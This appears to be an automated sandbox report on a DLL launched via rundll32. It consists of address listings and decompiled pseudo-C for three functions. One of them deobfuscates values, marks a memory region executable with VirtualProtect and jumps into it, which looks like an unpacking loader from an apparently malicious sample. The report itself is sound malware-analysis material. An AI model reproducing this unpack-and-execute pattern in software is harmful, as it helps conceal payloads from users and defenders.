                          0x6e248175
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e248177
                          0x6e2480e0
                          0x6e2480e0
                          0x6e2480e3
                          0x6e24810c
                          0x6e24810f
                          0x6e248113
                          0x6e24811d
                          0x6e248115
                          0x6e248115
                          0x6e248115
                          0x6e248123
                          0x6e248126
                          0x6e248142
                          0x6e248142
                          0x6e248145
                          0x6e248148
                          0x00000000
                          0x00000000
                          0x6e24814e
                          0x6e248151
                          0x6e248151
                          0x6e248154
                          0x00000000
                          0x00000000
                          0x6e248158
                          0x6e24815b
                          0x6e24815e
                          0x6e248161
                          0x6e248163
                          0x6e248166
                          0x6e248169
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24816b
                          0x6e248128
                          0x6e248128
                          0x6e24812b
                          0x00000000
                          0x00000000
                          0x6e24812d
                          0x6e248135
                          0x6e248138
                          0x6e24813b
                          0x6e24813b
                          0x00000000
                          0x6e248126
                          0x6e2480e5
                          0x6e2480e8
                          0x00000000
                          0x00000000
                          0x6e2480ef
                          0x6e2480ef
                          0x6e2480f2
                          0x6e248105
                          0x00000000
                          0x6e248105
                          0x6e2480f5
                          0x6e2480f5
                          0x6e2480f8
                          0x00000000
                          0x00000000
                          0x6e2480fe
                          0x00000000
                          0x6e2480fe
                          0x6e247f96
                          0x6e248094
                          0x6e248094
                          0x6e248097
                          0x6e2480ba
                          0x6e2480be
                          0x6e2480be
                          0x00000000
                          0x6e2480be
                          0x6e248099
                          0x6e248099
                          0x6e24809c
                          0x00000000
                          0x00000000
                          0x6e24809e
                          0x6e24809e
                          0x6e2480a1
                          0x6e2480b3
                          0x00000000
                          0x6e2480b3
                          0x6e2480a3
                          0x6e2480a3
                          0x6e2480a6
                          0x00000000
                          0x00000000
                          0x6e2480ac
                          0x00000000
                          0x6e2480ac
                          0x6e247f9c
                          0x6e247f9f
                          0x6e248041
                          0x6e248041
                          0x6e248046
                          0x6e24804c
                          0x6e24804c
                          0x6e24804d
                          0x6e248050
                          0x6e248056
                          0x6e248059
                          0x6e24805c
                          0x00000000
                          0x00000000
                          0x6e248062
                          0x6e248065
                          0x6e248065
                          0x6e248068
                          0x00000000
                          0x00000000
                          0x6e248070
                          0x6e248071
                          0x6e248074
                          0x6e248077
                          0x00000000
                          0x00000000
                          0x6e24807f
                          0x6e248082
                          0x6e248085
                          0x6e248087
                          0x6e24808a
                          0x6e24808d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24808f
                          0x6e248065
                          0x00000000
                          0x6e248050
                          0x6e247fa5
                          0x6e247fa8
                          0x6e247fbd
                          0x6e247fc3
                          0x6e247fca
                          0x6e247fcc
                          0x6e248027
                          0x6e24802d
                          0x6e24802e
                          0x6e248030
                          0x6e248035
                          0x6e248035
                          0x6e247fce
                          0x6e247fce
                          0x6e247fd1
                          0x6e247fd1
                          0x6e248038
                          0x00000000
                          0x6e248038
                          0x6e247faa
                          0x6e247fad
                          0x6e248007
                          0x6e248007
                          0x6e24800a
                          0x6e248016
                          0x6e24801a
                          0x6e24801a
                          0x00000000
                          0x6e24801a
                          0x6e24800c
                          0x6e24800c
                          0x6e24800f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e248011
                          0x6e247faf
                          0x6e247fb2
                          0x6e247fd6
                          0x6e247fd6
                          0x6e247fd9
                          0x6e247ffc
                          0x6e248000
                          0x6e248000
                          0x00000000
                          0x6e248000
                          0x6e247fdb
                          0x6e247fdb
                          0x6e247fde
                          0x00000000
                          0x00000000
                          0x6e247fe0
                          0x6e247fe0
                          0x6e247fe3
                          0x6e247ff5
                          0x00000000
                          0x6e247ff5
                          0x6e247fe5
                          0x6e247fe5
                          0x6e247fe8
                          0x00000000
                          0x00000000
                          0x6e247fee
                          0x00000000
                          0x6e247fee
                          0x6e247fb4
                          0x6e247fb7
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e247fb7
                          0x00000000
                          0x6e2481e2
                          0x6e247eda
                          0x6e247ee1
                          0x6e247f0a
                          0x6e247ee3
                          0x6e247ef2
                          0x6e247ef2
                          0x6e247f11
                          0x6e247f13
                          0x6e247f16
                          0x6e247f3b
                          0x6e247f3c
                          0x00000000
                          0x6e247f18
                          0x6e247f18
                          0x6e247f1b
                          0x6e247f1e
                          0x6e247f25
                          0x6e247f28
                          0x6e247f2b
                          0x6e247f2e
                          0x6e247f31
                          0x6e247f33
                          0x6e247f36
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e247f36
                          0x6e247f38
                          0x00000000
                          0x6e247f38
                          0x6e247f16
                          0x6e247e7e
                          0x6e247e80
                          0x6e247e82
                          0x6e247e8a
                          0x6e247eaf
                          0x6e247eb1
                          0x6e247ebb
                          0x6e247ebd
                          0x6e247ec0
                          0x6e247ec1
                          0x6e247ec3
                          0x00000000
                          0x00000000
                          0x6e247ec9
                          0x6e247eaa
                          0x6e247eaa
                          0x00000000
                          0x6e247eaa
                          0x6e247e8e
                          0x6e247e92
                          0x6e247e97
                          0x6e247e99
                          0x6e247e9e
                          0x00000000
                          0x00000000
                          0x6e247ea4
                          0x00000000
                          0x6e247ea4
                          0x6e247e65

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __freea
                          • String ID: a/p$am/pm
                          • API String ID: 240046367-3206640213
                          • Opcode ID: 8b7a1c1f4f5b0eb1ccb91d443d16c2fdaed5a47f03b2203cc9d45e7a5966055d
                          • Instruction ID: 62c3d0ebb481481a39a7dda47ff20ff33918b03a5916278e0e20b5e2f99a19c4
                          • Opcode Fuzzy Hash: 8b7a1c1f4f5b0eb1ccb91d443d16c2fdaed5a47f03b2203cc9d45e7a5966055d
                          • Instruction Fuzzy Hash: DFD1D37593424FDBDB4D8FE8C850BAAB7B2FF06301F14455AE928AB284E3759940CBD1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E1FF218, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 217memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E6E1FF218(signed int __edx) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				signed char _v24;
				signed int _t35;
				signed short _t37;
				void* _t45;
				intOrPtr _t46;
				signed int _t52;
				signed short _t60;
				signed char _t70;
				signed int _t73;
				signed char _t82;
				signed char _t85;
				signed short _t89;
				signed int _t97;
				void* _t99;
				signed int _t103;
				intOrPtr _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;
				signed char _t111;
				signed int _t117;
				signed int _t118;
				signed int _t123;
				signed int _t129;
				signed int _t130;
				signed char _t134;
				signed int _t135;
				signed char _t136;
				signed int _t138;
				void* _t139;
				signed short* _t140;
				signed short* _t144;
				signed short _t146;
				void* _t151;
				void* _t154;
				void* _t156;
				void* _t157;

				_t35 =  *0x6e2c59e6 & 0x0000ffff;
				_v12 = __edx;
				asm("cdq");
				_t103 = __edx;
				_v20 = 0xf;
				_t129 =  *0x6e2c59d8; // 0xb4ec04d4
				_t144 = 0x6e2c59e6;
				_t138 =  *0x6e2c5a00; // 0xf1bb93cc
				_v24 = _t35;
				_v16 = __edx;
				do {
					if(_t129 != _t35) {
						L3:
						_t5 = _t129 + 5; // 0xb4ec04d9
						_t138 = _t138 * ( *_t144 & 0x0000ffff);
						_t37 =  *0x6e2c59f0; // 0xcdeb0090
						_t105 = _t5 + _t138;
						 *0x6e2c5a90 = _t105;
						if(_t105 != (_t37 & 0x0000ffff)) {
							_t35 = _v24;
							_t103 = _v16;
							goto L5;
						}
					} else {
						_t151 =  *0x6e2c59dc - _t103; // 0x4
						if(_t151 == 0) {
							goto L5;
						} else {
							goto L3;
						}
					}
					break;
					L5:
					_t144 =  &(_t144[1]);
				} while (_t144 < 0x6e2c5a44);
				_t145 = _v12 * 0x10e1d;
				 *0x6e2c5a00 = _t138;
				_t139 =  *0x6e2dc8d0; // 0x6e2c86a0
				 *0x6e2c5a04 = _t129 -  *0x6e2c5a04 + 0x11;
				 *0x6e2c8698 = _t139;
				 *0x6e2c59d8 = E6E2201E0(_v12 * 0x10e1d, 0, _t129,  *0x6e2c59dc);
				 *0x6e2c59dc = _t129;
				VirtualProtect(_t139, 0x305a, 0x40, 0x6e2c869c);
				_t130 =  *0x6e2c59d0; // 0xf9ac1f88
				_t45 = 6;
				_v24 = _t130;
				_t154 =  *0x6e2c5a02 - _t45; // 0xf1bb
				if(_t154 == 0) {
					_t46 =  *0x6e2c5a90; // 0x843221fd
					 *0x6e2c5a00 = _t46 + 0x11dde + _t130;
				} else {
					 *0x6e2c5a90 =  *0x6e2c5a90 +  ~_t130 -  *0x6e2c5a00 * 0x3d;
				}
				_t106 =  *0x6e2c59d8; // 0xb4ec04d4
				_t131 =  *0x6e2c59e6 & 0x0000ffff;
				_v5 = _t130 + _t106;
				if(( *0x6e2c59f2 & 0x0000ffff) + ( *0x6e2c59e6 & 0x0000ffff) != 0x32) {
					_t52 = E6E2201E0(_t145, 0, _t106,  *0x6e2c59dc);
					_v16 = _t52;
					_v20 = _t52 * 0x00000037 & 0x0000ffff;
				} else {
					_t97 =  *0x6e2c59dc; // 0x4
					_t99 = E6E2201E0(E6E2201E0(_t106, _t97, _t106, _t97), _t131, 0xfffef1e3, 0xffffffff);
					_push(0);
					_v16 = _t99 + _v12 + 0xf;
				}
				_t140 = 0x6e2c59e6;
				_t109 = _v16;
				_t134 = 0x70 * (_v24 & 0x000000ff) + 0x70;
				_v24 = _t134;
				 *0x6e2c5a04 = _t134;
				_t156 =  *0x6e2c5a04 - 0x1b47; // 0xb4
				if(_t156 != 0) {
					_t60 = _v20;
				} else {
					asm("cdq");
					_t134 = _v24;
					_t123 = _t109 + ( *0x6e2c59e6 & 0x0000ffff);
					_v16 = _t123;
					_t60 = _v20 + _t123 * 2 + 0x3b;
				}
				_t110 = 6;
				_t157 =  *0x6e2c5a02 - _t110; // 0xf1bb
				if(_t157 == 0) {
					 *0x6e2c5a00 = (_t60 & 0x0000ffff) + 0x11dde + (_t134 & 0x000000ff);
				}
				_t111 =  *0x6e2c59d0; // 0xf9ac1f88
				 *0x6e2c59dc =  *0x6e2c59dc & 0x00000000;
				_t146 = _v16 + 0x00000005 + _t111 & 0x0000ffff;
				 *0x6e2c59d8 = _t146 - _v12 - 0x54;
				 *0x6e2c59d0 = _t111 + 0x23bbc + (_t134 & 0x000000ff) * 2;
				 *0x6e2c8698();
				_t70 =  *0x6e2c59d0; // 0xf9ac1f88
				_t135 = _v12;
				 *0x6e2c59d8 =  *0x6e2c59d8 + _t70 + 0x3b + ( *0x6e2c5a04 & 0x000000ff);
				_t73 =  *0x6e2c59e6 & 0x0000ffff;
				asm("adc dword [0x6e2c59dc], 0x0");
				do {
					if(_t135 == _t73) {
						goto L22;
					} else {
						_t146 = ( *_t140 & 0x0000ffff) * (_t146 & 0x0000ffff) & 0x0000ffff;
						_t117 = _t135 + 5 + _t146;
						 *0x6e2c59dc = 0;
						_t89 =  *0x6e2c59f0; // 0xcdeb0090
						asm("cdq");
						 *0x6e2c59d8 = _t117;
						if(_t117 != (_t89 & 0x0000ffff)) {
							L21:
							_t73 =  *0x6e2c59e6 & 0x0000ffff;
							_t135 = _v12;
							goto L22;
						} else {
							_t73 = 0;
							if(0 != _t135) {
								goto L21;
							}
						}
					}
					break;
					L22:
					_t140 =  &(_t140[1]);
				} while (_t140 < 0x6e2c5a44);
				asm("das");
				asm("fstp9 st1");
				_t118 =  *0x6e2c59d8; // 0xb4ec04d4
				_t136 =  *0x6e2c59d0; // 0xf9ac1f88
				_push(0);
				asm("adc [0x6e2c59dc], eax");
				 *0x6e2c59d8 = _t118 + (_t146 - _t118 * 0x0000003d - _v12 & 0x0000ffff) + 0x3b + _t136;
				_t82 = ((_t136 & 0x000000ff) * ( *0x6e2c5a04 & 0x000000ff) & 0x000000ff) * 0x1d;
				 *0x6e2c5a04 = _t82;
				_t85 = (_t82 & 0x000000ff) * 0x36 + _t136;
				 *0x6e2c59d0 = _t85;
				return _t85;
			}












































                          0x6e1ff21e
                          0x6e1ff225
                          0x6e1ff228
                          0x6e1ff22a
                          0x6e1ff22c
                          0x6e1ff233
                          0x6e1ff239
                          0x6e1ff23f
                          0x6e1ff245
                          0x6e1ff248
                          0x6e1ff24b
                          0x6e1ff24d
                          0x6e1ff257
                          0x6e1ff25a
                          0x6e1ff25d
                          0x6e1ff260
                          0x6e1ff268
                          0x6e1ff26a
                          0x6e1ff272
                          0x6e1ff274
                          0x6e1ff277
                          0x00000000
                          0x6e1ff277
                          0x6e1ff24f
                          0x6e1ff24f
                          0x6e1ff255
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e1ff255
                          0x00000000
                          0x6e1ff27a
                          0x6e1ff27a
                          0x6e1ff27d
                          0x6e1ff28b
                          0x6e1ff29c
                          0x6e1ff2a2
                          0x6e1ff2a8
                          0x6e1ff2b2
                          0x6e1ff2ca
                          0x6e1ff2cf
                          0x6e1ff2d5
                          0x6e1ff2db
                          0x6e1ff2e3
                          0x6e1ff2e4
                          0x6e1ff2e7
                          0x6e1ff2ee
                          0x6e1ff305
                          0x6e1ff311
                          0x6e1ff2f0
                          0x6e1ff2fd
                          0x6e1ff2fd
                          0x6e1ff316
                          0x6e1ff31f
                          0x6e1ff326
                          0x6e1ff335
                          0x6e1ff36b
                          0x6e1ff370
                          0x6e1ff379
                          0x6e1ff337
                          0x6e1ff337
                          0x6e1ff34e
                          0x6e1ff356
                          0x6e1ff35c
                          0x6e1ff35c
                          0x6e1ff385
                          0x6e1ff395
                          0x6e1ff3a0
                          0x6e1ff3a2
                          0x6e1ff3a5
                          0x6e1ff3ab
                          0x6e1ff3b2
                          0x6e1ff3cf
                          0x6e1ff3b4
                          0x6e1ff3bb
                          0x6e1ff3bc
                          0x6e1ff3bf
                          0x6e1ff3c4
                          0x6e1ff3ca
                          0x6e1ff3ca
                          0x6e1ff3d4
                          0x6e1ff3d5
                          0x6e1ff3dc
                          0x6e1ff3eb
                          0x6e1ff3eb
                          0x6e1ff3f3
                          0x6e1ff3fc
                          0x6e1ff405
                          0x6e1ff416
                          0x6e1ff421
                          0x6e1ff426
                          0x6e1ff42c
                          0x6e1ff43b
                          0x6e1ff440
                          0x6e1ff446
                          0x6e1ff44d
                          0x6e1ff454
                          0x6e1ff456
                          0x00000000
                          0x6e1ff458
                          0x6e1ff461
                          0x6e1ff469
                          0x6e1ff46d
                          0x6e1ff472
                          0x6e1ff47a
                          0x6e1ff47b
                          0x6e1ff483
                          0x6e1ff48b
                          0x6e1ff48b
                          0x6e1ff492
                          0x00000000
                          0x6e1ff485
                          0x6e1ff485
                          0x6e1ff489
                          0x00000000
                          0x00000000
                          0x6e1ff489
                          0x6e1ff483
                          0x00000000
                          0x6e1ff495
                          0x6e1ff495
                          0x6e1ff498
                          0x6e1ff4a1
                          0x6e1ff4a2
                          0x6e1ff4a4
                          0x6e1ff4aa
                          0x6e1ff4b3
                          0x6e1ff4c5
                          0x6e1ff4d2
                          0x6e1ff4e3
                          0x6e1ff4e6
                          0x6e1ff4f1
                          0x6e1ff4f3
                          0x6e1ff4f9

                          APIs
                          • VirtualProtect.KERNEL32(6E2C86A0,0000305A,00000040,6E2C869C,?,00000000,B4EC04D4,008BCDEB,?), ref: 6E1FF2D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID: DZ,n$DZ,n$E
                          • API String ID: 544645111-3488571717
                          • Opcode ID: 7b69f7bbc56599ba95007a87458e53b184574e811696793878eaa64c24477857
                          • Instruction ID: 331258f8ce98d70d3860fa178d7b431092c3152db7a2a0804e97dc074c997fe7
                          • Opcode Fuzzy Hash: 7b69f7bbc56599ba95007a87458e53b184574e811696793878eaa64c24477857
                          • Instruction Fuzzy Hash: ED811271A415618FCF88CFAAC88D6797BF6BB5AB10B20815BE441D7380E378E541DBB1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E204267, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON
                          Download Yara Rule
                          C-Code - Quality: 87%
                          			E6E204267(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t44;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t56;
				intOrPtr _t58;
				void* _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t76;
				intOrPtr _t81;
				signed int _t82;
				void* _t85;
				signed int _t87;
				signed int _t89;

				E6E220117(0x6e2680ee, __ebx, __edi, __esi, 0x20);
				 *((intOrPtr*)(_t85 - 0x14)) = 0x6e2c6b60;
				_t65 = E6E241EEC(L"For");
				_t38 =  *0x6e2c6b60; // 0x6e26aabc
				 *((intOrPtr*)(_t85 - 0x18)) = _t65;
				_t3 = _t38 + 4; // 0x8
				_t39 =  *_t3;
				_t4 = _t39 + 0x6e2c6b84; // 0x0
				_t62 =  *_t4;
				_t5 = _t39 + 0x6e2c6b80; // 0x0
				_t81 =  *_t5;
				_t87 = _t62;
				if(_t87 < 0) {
					L7:
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x24], xmm0");
					_t62 =  *(_t85 - 0x20);
					_t82 =  *(_t85 - 0x24);
				} else {
					if(_t87 > 0) {
						L6:
						_t82 = _t81 - _t65;
						asm("sbb ebx, esi");
					} else {
						if(_t81 <= 0) {
							goto L7;
						} else {
							_t89 = _t62;
							if(_t89 < 0 || _t89 <= 0 && _t81 <= _t65) {
								goto L7;
							} else {
								goto L6;
							}
						}
					}
				}
				_t8 = _t85 - 0x14; // 0x6e2c6b60
				_push( *_t8);
				E6E20220B(_t62, _t85 - 0x2c, _t82, 0);
				 *((intOrPtr*)(_t85 - 4)) = 0;
				if( *((char*)(_t85 - 0x28)) != 0) {
					 *((char*)(_t85 - 4)) = 1;
					_t67 =  *0x6e2c6b60; // 0x6e26aabc
					_t13 = _t67 + 4; // 0x8
					_t14 =  *_t13 + 0x6e2c6b74; // 0x201
					__eflags = ( *_t14 & 0x000001c0) - 0x40;
					if(( *_t14 & 0x000001c0) == 0x40) {
						L16:
						_t18 = _t67 + 4; // 0x8
						_t44 =  *_t18;
						_t20 = _t44 + 0x6e2c6b98; // 0x6e2c6bb0
						_t46 =  *((intOrPtr*)( *((intOrPtr*)( *_t20)) + 0x24))(L"For",  *((intOrPtr*)(_t85 - 0x18)), 0);
						__eflags = _t46 -  *((intOrPtr*)(_t85 - 0x18));
						if(_t46 !=  *((intOrPtr*)(_t85 - 0x18))) {
							goto L22;
						} else {
							__eflags = _t76;
							if(_t76 != 0) {
								goto L22;
							} else {
								while(1) {
									__eflags = _t62;
									if(__eflags < 0) {
										break;
									}
									if(__eflags > 0) {
										L21:
										_t54 =  *0x6e2c6b60; // 0x6e26aabc
										_t23 = _t54 + 4; // 0x8
										_t55 =  *_t23;
										_t24 = _t55 + 0x6e2c6ba0; // 0x20
										_t25 = _t55 + 0x6e2c6b98; // 0x6e2c6bb0
										_t56 = E6E203F18( *_t25,  *_t24 & 0x0000ffff);
										__eflags = 0xffff - _t56;
										if(0xffff != _t56) {
											_t82 = _t82 + 0xffffffff;
											asm("adc ebx, 0xffffffff");
											continue;
										} else {
											goto L22;
										}
									} else {
										__eflags = _t82;
										if(_t82 <= 0) {
											break;
										} else {
											goto L21;
										}
									}
									goto L25;
								}
								_t63 = 0;
							}
						}
					} else {
						while(1) {
							__eflags = _t62;
							if(__eflags < 0) {
								goto L16;
							}
							if(__eflags > 0) {
								L14:
								_t15 = _t67 + 4; // 0x8
								_t58 =  *_t15;
								_t16 = _t58 + 0x6e2c6ba0; // 0x20
								_t76 =  *_t16 & 0x0000ffff;
								_t17 = _t58 + 0x6e2c6b98; // 0x6e2c6bb0
								_t59 = E6E203F18( *_t17, _t76);
								__eflags = 0xffff - _t59;
								if(0xffff == _t59) {
									L22:
									_t63 = 4;
								} else {
									_t67 =  *0x6e2c6b60; // 0x6e26aabc
									_t82 = _t82 + 0xffffffff;
									asm("adc ebx, 0xffffffff");
									continue;
								}
							} else {
								__eflags = _t82;
								if(_t82 <= 0) {
									goto L16;
								} else {
									goto L14;
								}
							}
							goto L25;
						}
						goto L16;
					}
					L25:
					_t47 =  *0x6e2c6b60; // 0x6e26aabc
					_t26 = _t47 + 4; // 0x8
					_t48 =  *_t26;
					 *((intOrPtr*)(_t48 + 0x6e2c6b80)) = 0;
					 *((intOrPtr*)(_t48 + 0x6e2c6b84)) = 0;
					 *((intOrPtr*)(_t85 - 4)) = 0;
				} else {
					_t63 = 4;
				}
				_t49 =  *0x6e2c6b60; // 0x6e26aabc
				_t30 = _t49 + 4; // 0x8
				_t32 =  *_t30 +  *((intOrPtr*)(_t85 - 0x14)) + 0xc; // 0x0
				E6E203A25( *_t30 +  *((intOrPtr*)(_t85 - 0x14)),  *_t32 | _t63, 0);
				E6E2021C1(_t63, _t85 - 0x2c, _t82,  *_t32 | _t63);
				return E6E220075( *((intOrPtr*)(_t85 - 0x14)));
			}

























                          0x6e20426e
                          0x6e204278
                          0x6e204287
                          0x6e204289
                          0x6e20428e
                          0x6e204291
                          0x6e204291
                          0x6e204294
                          0x6e204294
                          0x6e20429a
                          0x6e20429a
                          0x6e2042a0
                          0x6e2042a2
                          0x6e2042ba
                          0x6e2042ba
                          0x6e2042bd
                          0x6e2042c2
                          0x6e2042c5
                          0x6e2042a4
                          0x6e2042a4
                          0x6e2042b4
                          0x6e2042b4
                          0x6e2042b6
                          0x6e2042a6
                          0x6e2042a8
                          0x00000000
                          0x6e2042aa
                          0x6e2042aa
                          0x6e2042ac
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e2042ac
                          0x6e2042a8
                          0x6e2042a4
                          0x6e2042c8
                          0x6e2042c8
                          0x6e2042ce
                          0x6e2042d3
                          0x6e2042da
                          0x6e2042e4
                          0x6e2042e8
                          0x6e2042ee
                          0x6e2042f1
                          0x6e2042fc
                          0x6e2042ff
                          0x6e20433c
                          0x6e20433c
                          0x6e20433c
                          0x6e204343
                          0x6e204350
                          0x6e204353
                          0x6e204356
                          0x00000000
                          0x6e204358
                          0x6e204358
                          0x6e20435a
                          0x00000000
                          0x6e20435c
                          0x6e20435c
                          0x6e20435c
                          0x6e20435e
                          0x00000000
                          0x00000000
                          0x6e204360
                          0x6e204366
                          0x6e204366
                          0x6e20436b
                          0x6e20436b
                          0x6e20436e
                          0x6e204375
                          0x6e20437c
                          0x6e204389
                          0x6e20438c
                          0x6e204393
                          0x6e204396
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e204362
                          0x6e204362
                          0x6e204364
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e204364
                          0x00000000
                          0x6e204360
                          0x6e20439b
                          0x6e20439b
                          0x6e20435a
                          0x6e204301
                          0x6e204301
                          0x6e204301
                          0x6e204303
                          0x00000000
                          0x00000000
                          0x6e204305
                          0x6e20430b
                          0x6e20430b
                          0x6e20430b
                          0x6e20430e
                          0x6e20430e
                          0x6e204315
                          0x6e20431c
                          0x6e204329
                          0x6e20432c
                          0x6e20438e
                          0x6e204390
                          0x6e20432e
                          0x6e20432e
                          0x6e204334
                          0x6e204337
                          0x00000000
                          0x6e204337
                          0x6e204307
                          0x6e204307
                          0x6e204309
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e204309
                          0x00000000
                          0x6e204305
                          0x00000000
                          0x6e204301
                          0x6e20439d
                          0x6e20439d
                          0x6e2043a2
                          0x6e2043a2
                          0x6e2043a5
                          0x6e2043ab
                          0x6e2043d6
                          0x6e2042dc
                          0x6e2042de
                          0x6e2042de
                          0x6e2043d9
                          0x6e2043df
                          0x6e2043e5
                          0x6e2043eb
                          0x6e2043f3
                          0x6e204400

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: H_prolog3_catch_wcslen
                          • String ID: For$`k,n
                          • API String ID: 1260878687-1763375410
                          • Opcode ID: 388df7aa412f50ede240fee3d40f7d71c0cf55d3a2a2837a6dea8f03a4796fad
                          • Instruction ID: 67532f0e83a35c3b0ebb2299c210994367130e8a5225051f6bfa046bdc138d45
                          • Opcode Fuzzy Hash: 388df7aa412f50ede240fee3d40f7d71c0cf55d3a2a2837a6dea8f03a4796fad
                          • Instruction Fuzzy Hash: A6419C79A2021E8FCB40DBE8C5D49ACB7B3BF9AB14B208245E551BB3D1C670E842C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E258AAC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 66%
                          			E6E258AAC(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v264;
				char _v268;
				char _v272;
				void* __esi;
				void* __ebp;
				signed int _t10;
				void* _t14;
				signed int _t22;
				void* _t28;
				signed int _t37;
				signed int _t43;
				void* _t44;
				signed int _t45;
				signed int _t49;

				_t35 = __edx;
				_t47 = _t49;
				_t10 =  *0x6e2c506c; // 0x5cc08226
				_v8 = _t10 ^ _t49;
				 *0x6e2c5384 =  *0x6e2c5384 | 0xffffffff;
				 *0x6e2c5378 =  *0x6e2c5378 | 0xffffffff;
				_push(__ebx);
				_push(__edi);
				_t37 = 0;
				 *0x6e2c7a10 = 0;
				_t14 = E6E251216(0x6e272130, __edx, 0, __eflags,  &_v268,  &_v264, 0x100, 0x6e272130);
				if(_t14 != 0) {
					__eflags = _t14 - 0x22;
					if(__eflags == 0) {
						_t45 = E6E24F26D(_t28, _v268);
						__eflags = _t45;
						if(__eflags != 0) {
							_t22 = E6E251216(0x6e272130, __edx, 0, __eflags,  &_v272, _t45, _v268, 0x6e272130);
							__eflags = _t22;
							if(_t22 == 0) {
								E6E24CBD3(0);
								_t37 = _t45;
							} else {
								_push(_t45);
								goto L6;
							}
						} else {
							_push(0);
							L6:
							E6E24CBD3();
						}
					}
				} else {
					_t37 =  &_v264;
				}
				asm("sbb esi, esi");
				_t43 =  ~(_t37 -  &_v264) & _t37;
				if(_t37 == 0) {
					L14:
					E6E258951(0x6e272130, _t37, __eflags);
				} else {
					_t57 =  *_t37;
					if( *_t37 == 0) {
						goto L14;
					} else {
						_push(_t37);
						E6E25877C(0x6e272130, _t37, _t57);
					}
				}
				E6E24CBD3(_t43);
				_pop(_t44);
				return E6E21F8A5(_v8 ^ _t47, _t35, _t44);
			}


















                          0x6e258aac
                          0x6e258aaf
                          0x6e258ab7
                          0x6e258abe
                          0x6e258ac1
                          0x6e258ace
                          0x6e258ad5
                          0x6e258ad7
                          0x6e258add
                          0x6e258aec
                          0x6e258af3
                          0x6e258afd
                          0x6e258b07
                          0x6e258b0a
                          0x6e258b17
                          0x6e258b1a
                          0x6e258b1c
                          0x6e258b35
                          0x6e258b3d
                          0x6e258b3f
                          0x6e258b45
                          0x6e258b4a
                          0x6e258b41
                          0x6e258b41
                          0x00000000
                          0x6e258b41
                          0x6e258b1e
                          0x6e258b1e
                          0x6e258b1f
                          0x6e258b1f
                          0x6e258b1f
                          0x6e258b4c
                          0x6e258aff
                          0x6e258aff
                          0x6e258aff
                          0x6e258b59
                          0x6e258b5b
                          0x6e258b5f
                          0x6e258b6f
                          0x6e258b6f
                          0x6e258b61
                          0x6e258b61
                          0x6e258b64
                          0x00000000
                          0x6e258b66
                          0x6e258b66
                          0x6e258b67
                          0x6e258b6c
                          0x6e258b64
                          0x6e258b75
                          0x6e258b7f
                          0x6e258b8b

                          APIs
                          • _free.LIBCMT ref: 6E258B1F
